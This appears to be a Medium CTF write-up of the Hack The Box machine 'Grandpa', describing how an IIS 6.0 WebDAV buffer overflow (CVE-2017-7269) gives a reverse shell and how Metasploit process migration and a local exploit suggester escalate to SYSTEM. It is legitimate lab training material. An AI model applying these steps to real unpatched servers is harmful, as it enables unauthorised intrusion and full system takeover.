Hack The Box — Grandpa

Grandpa is a Medium level difficult Windows box on Hack The Box.It is almost similar to another box named “Granny” and is also an OSCP like machine.DO NOTE that this machine cannot be solved easily without metasploit so it is suggested to solve it using metasploit.Moreover this machine can also be glitchy at times.At the end, i will cover another way to solve without metasploit as well.

ENUMERATION

We find that only port 80 is open and is running an outdated IIS server

We try to find hidden directories and even looking at the source code of the default page however we are unable to find anything useful. and we are out of ideas.

Now the only option we have is to run a service exploit.Moreover i also know that IIS 6.0 is outdated as i have faced IIS 10 in other ctfs.So lets google and surprisingly All the exploit suggestions we get is the same (CVE 2017–7269)

Its a buffer overflow exploit(Avoid using the one in exploit-db) we thankfully find one in Github which is written in python and has a very simple usage.

EXPLOIT LINK-https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Just run the exploit- python exploited.py and it will show the usage which is very simple.

USAGE- python exploit.py RHOST RPORT LHOST LPORT

we got a shell !! but as Network Service not SYSTEM which is the most privileged user.

NOW DO NOTE THAT THE SHELL IS VERY UNSTABLE. I wasted 1 hour here and wasn’t able to download any file using wget,certuril or even powershell.And if you refer any other writeup, Everyone else faced the same problem as well and thus we have to use metasploit in this pirticular box.

However moving on, i was able to see some interesting stuff like the Users folder was not there and instead there was a folder called Documents and Settings.

I also found that this box is vulnerable to juicy potato as both privileges are enabled.DO NOTE THAT this box can also be solved manually without using Metasploit as there is a folder called wmpub in the C:\ directory which allows read and write access.Basically this is the only folder where we can read and write. I would highly suggest you to refer to this writeup by 0xdf -https://0xdf.gitlab.io/2020/05/28/htb-grandpa.html (i you wanna solve it manually)

USING METASPLOIT

We search for the cve of the same buffer overflow exploit used before and find it immediately.

Now we run the command- “shows options” and set the options accordingly and hit “run”

And boom ! we have a shell.(If this fails, try again as metasploit can be problematic at times)

However when i try to run commands like “whoami” or “getuid”, it throws an error. This is because we are currently not running as a privileged process.

We run the command “ps” which shows all running processes and their PID(process id)

We migrate to the process wmiprvse.exe which has the PID 1936by running the command- “migrate 1936” since its owned by NT authority\Network Service and also has the correct architecture x86. (We can also migrate to w3wp or davcdata.exe if we wish to)

A we can see above, we can now Successfully run “getuid” command now.Perviously it was throwing an error.

PRIVILEGE ESCALATION

Now, in order to privilege escalate, all we need to do is run windows local exploit suggester. But first we have to background our current session by running the command “background”

Make sure to choose your correct session number and hit “run”. This will give us a list of possible exploits we can use.DO NOTE THAT we will only use the exploits saying “The target appears to be vulnerable”

Lets go with the second one

make sure to set your correct session accordingly and hit “run”

And we got a shell as SYSTEM !!!

The user and root flags can be found within “Documents and Settings” folder

download it using the download command of metasploit.

I hope you learned from this writeup.Make sure you follow me on Medium for more such ctf writeups and Cybersecurity articles.

ZEUS

--

--

--

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

FEATURES_AND_BENEFITS_OF_METAMASK.DOCX_.SERVICE

My Journey To Security Engineering

SOC143 — Password Stealer Detected (Letsdefend.io) step-by-step analysis

Elevating Permissions in AWS IAM

Personal security in Telegram investigations

Residential Security Trends in 2021 and Beyond

How To Install & Remove Search Encrypt

Umbo announces integration with Gallagher Command Centre

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Nibbles

Hackthebox — Devzat Walkthrough

How to get Invite code in Hack The Box

Journey of a Cyber Guardian : Reconnaissance